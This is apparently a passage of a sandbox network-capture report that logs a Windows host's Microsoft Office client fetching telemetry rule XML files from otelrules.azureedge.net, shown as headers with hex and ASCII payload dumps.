2024-11-05 17:46:08 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:08 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6CF78C8" x-ms-request-id: 1ec43ba4-f01e-0003-65d2-2c4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174608Z-16547b76f7fnm7lfhC1DFWkxt400000005ag00000000q304 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:08 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.4	49813	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:08 UTC	192	OUT	GET /rules/rule120677v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:09 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:09 GMT Content-Type: text/xml Content-Length: 405 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT ETag: "0x8DC582B942B6AFF" x-ms-request-id: 37d16708-f01e-0003-7060-2e4453000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174608Z-17df447cdb5w28bthC1DFWgb6400000001c000000000qe4a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:09 UTC	405	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.4	49812	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:08 UTC	192	OUT	GET /rules/rule120676v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:09 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:09 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B984BF177" x-ms-request-id: 776f9dcf-101e-008d-0d60-2e92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174609Z-15869dbbcc6rmhmhhC1DFWd7b800000005cg00000000he9z x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:09 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.4	49814	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:09 UTC	192	OUT	GET /rules/rule120678v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:09 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:09 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA642BF4" x-ms-request-id: 229e582e-901e-0083-26d2-2cbb55000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174609Z-16547b76f7fsjlq8hC1DFWehq0000000056g00000000nwve x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:09 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	49815	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:09 UTC	192	OUT	GET /rules/rule120679v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:09 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:09 GMT Content-Type: text/xml Content-Length: 174 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91D80E15" x-ms-request-id: c3d6966f-401e-0016-3ad8-2b53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174609Z-16547b76f7fq9mcrhC1DFWq15w00000005ag00000000vnrs x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:09 UTC	174	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	49816	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:09 UTC	192	OUT	GET /rules/rule120680v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:09 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:09 GMT Content-Type: text/xml Content-Length: 1952 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B956B0F3D" x-ms-request-id: d5f81cfa-001e-0017-1dd2-2c0c3c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174609Z-16547b76f7fmbrhqhC1DFWkds800000005e000000000sw5c x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:09 UTC	1952	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	49817	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:09 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:09 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:09 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 8a5e2199-d01e-0014-3f2b-2ced58000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174609Z-16547b76f7fr28cchC1DFWnuws00000005fg00000000tqdq x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:09 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	49819	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:09 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:10 UTC	494	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:10 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: 86102881-001e-0034-7355-2edd04000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174610Z-15869dbbcc6xcpf8hC1DFWxtx000000005hg000000002zxt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:10 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	49818	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:09 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:10 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:10 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: 62c29a92-201e-003c-094f-2e30f9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174610Z-15869dbbcc6rmhmhhC1DFWd7b800000005fg000000008y2e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:10 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.4	49820	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:10 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:10 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:10 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 659aa3e6-801e-008f-64d2-2c2c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174610Z-16547b76f7fp6mhthC1DFWrggn00000005eg00000000xezb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:10 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49821	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:10 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:10 UTC	517	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:10 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: 87c6e767-f01e-003c-4308-2c8cf0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174610Z-16547b76f7f8dwtrhC1DFWd1zn00000005g000000000ssrn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:10 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	49822	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:10 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:10 UTC	538	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:10 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 4e98fbea-b01e-0002-08d2-2c1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174610Z-16547b76f7fcjqqhhC1DFWrrrc00000005b000000000up58 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:10 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	49823	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
